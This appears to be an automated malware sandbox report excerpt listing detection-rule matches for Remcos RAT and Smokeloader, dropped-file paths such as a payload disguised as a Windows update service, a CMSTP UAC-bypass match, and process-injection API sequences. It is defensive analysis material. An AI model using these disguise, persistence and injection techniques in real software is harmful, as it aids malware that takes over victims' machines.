                        Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e | Author: unknown
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e | Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_0040259B: NtEnumerateKey
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_004014B0: NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_004014CD: NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_004014E0: NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_004014F3: NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 15_2_004014BB: NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A04763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009F1B4D: LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_0040348F: EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FF20D: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FF20D: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001AF20D: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00406AFA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B8017
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_0099E1F0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009AE144
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009922AD
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B22A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009CA26E
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009AC624
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A1C8A4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009CE87F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009C6ADE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A02A05
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009F8BFF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009ACD7A
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009BCE10
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009C7159
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00999240
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A25311
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009996E0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B1704
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B1A76
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B7B8B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00999B60
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B7DBA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B1D20
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009B1FE7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B8017
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_0099E1F0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B22A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009CA26E
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_0099226D
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009AC4B7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A1C8A4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009CE87F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009C6ADE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A02A05
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009F8BFF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009BCE10
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009C7159
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00999240
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A25311
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009996E0
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B1704
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B1A76
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B7B8B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00999B60
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B7DBA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B1D20
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009B1FE7
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00168017
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0015E144
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0014E1F0
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0017A26E
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001622A2
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001422AD
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0015C624
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0017E87F
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001CC8A4
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B2A05
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00176ADE
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001A8BFF
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0015CD7A
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_0016CE10
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00177159
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00149240
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001D5311
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001496E0
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00161704
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00161A76
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00149B60
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00167B8B
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00161D20
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00167DBA
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_00161FE7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E7A9C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C7B60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E6B50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E1720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C1000
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D42D4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C92D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99DF320
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E4A60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2274
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E1720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2A94
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D84BC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99DAC50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99DECA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2480
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8EF4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E26C4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D3ED0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E4EFC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2684
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E6DCC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D3540
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E7550
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C9D9B
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2070
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D2890
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99EA7D8
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99DE80C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99CA76D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C9F3B
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D6750
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFB3CF160
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFBAB6100
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241D8E
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241EDD
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF265CF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241CBC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241AD7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2B9B30
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2421DF
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241546
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241596
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF285770
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF28D7C0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF26B700
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF289370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241FD7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF24155A
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF28D2F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2570B0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2421C1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241C12
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF306D90
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2424D7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF24149C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF24117C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241618
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF242612
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2426FD
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF24143D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2413DE
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2417F8
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2B26E0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2416FE
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF248630
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241A0F
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2AC530
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF2783F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF241B54
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFF24116D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF35090
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFED4FE0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEA0FB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF1D120
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF1A170
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF1B1A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEACF10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF481D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF14200
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF36220
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEFBE70
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEBCE30
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF342A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEEFE10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEBEDE0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF40360
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF49370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEB1D20
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF02D1D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEEDD10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFE9BCF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF06CF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF47430
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFF01C60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFEEAC60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFE93BD0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 22_2_00007FFDFFE9FBC0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFED9BB022_2_00007FFDFFED9BB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF0C51022_2_00007FFDFFF0C510
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE99BA022_2_00007FFDFFE99BA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB6B4022_2_00007FFDFFEB6B40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3E58022_2_00007FFDFFF3E580
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB7B1022_2_00007FFDFFEB7B10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA9AB022_2_00007FFDFFEA9AB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEF6A1022_2_00007FFDFFEF6A10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEAC9A022_2_00007FFDFFEAC9A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEBD8D022_2_00007FFDFFEBD8D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9A8A022_2_00007FFDFFE9A8A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9283E22_2_00007FFDFFE9283E
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE947E022_2_00007FFDFFE947E0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1996022_2_00007FFDFFF19960
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA672022_2_00007FFDFFEA6720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF21AD022_2_00007FFDFFF21AD0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFED45D022_2_00007FFDFFED45D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF43AF022_2_00007FFDFFF43AF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF27B5022_2_00007FFDFFF27B50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9453022_2_00007FFDFFE94530
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB950022_2_00007FFDFFEB9500
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE994C022_2_00007FFDFFE994C0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFECC4B922_2_00007FFDFFECC4B9
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF46C1022_2_00007FFDFFF46C10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3CC4022_2_00007FFDFFF3CC40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA342022_2_00007FFDFFEA3420
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA238022_2_00007FFDFFEA2380
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEB37022_2_00007FFDFFEEB370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF17D5022_2_00007FFDFFF17D50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF52D6022_2_00007FFDFFF52D60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEDB31022_2_00007FFDFFEDB310
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF2BDB022_2_00007FFDFFF2BDB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE972F122_2_00007FFDFFE972F1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEC2F022_2_00007FFDFFEEC2F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE932A522_2_00007FFDFFE932A5
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF35E2022_2_00007FFDFFF35E20
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEE628022_2_00007FFDFFEE6280
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF45E4022_2_00007FFDFFF45E40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEF420022_2_00007FFDFFEF4200
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF39EC022_2_00007FFDFFF39EC0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEFB13022_2_00007FFDFFEFB130
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF38FA022_2_00007FFDFFF38FA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEC10E022_2_00007FFDFFEC10E0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009D22D0 appears 55 times
